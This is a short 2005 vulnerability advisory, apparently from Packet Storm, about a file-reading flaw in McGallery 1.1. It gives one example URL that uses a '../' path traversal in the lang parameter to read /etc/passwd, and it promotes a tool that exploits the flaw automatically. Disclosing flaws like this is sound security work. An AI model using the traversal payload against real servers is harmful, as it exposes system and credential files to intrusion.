phpforum11.txt

2005-06-21T00:00:00
ID PACKETSTORM:38178
Type packetstorm
Reporter d_bug
Modified 2005-06-21T00:00:00

Description

                                        
                                            `Vendor: Phpforum, http://www.phpforums.net/  
Product: McGallery v 1.1  
  
Vulnerability: files reading on disk  
Consequences: Web server paths are opened   
Risk: High  
  
Description: Attacker can form the query in URL form ang get the access to the system files  
Example: thttp://example.com/mcgallery/admin.php?lang=../../../../../../etc/passwd  
  
Discoveried By D_BuG d_bug@bk.ru  
NemesisSecurityTeam  
http://nemesisoftware.com/  
  
CheckZond free v. 1.0 http://nemesisoftware.com/products.htm  
uses the vulnerabilities above for automatic vulnerabilities search (Google Hacking technique) and usage.  
  
--   
Best regards,  
D_BuG mailto:d_bug@bk.ru  
  
`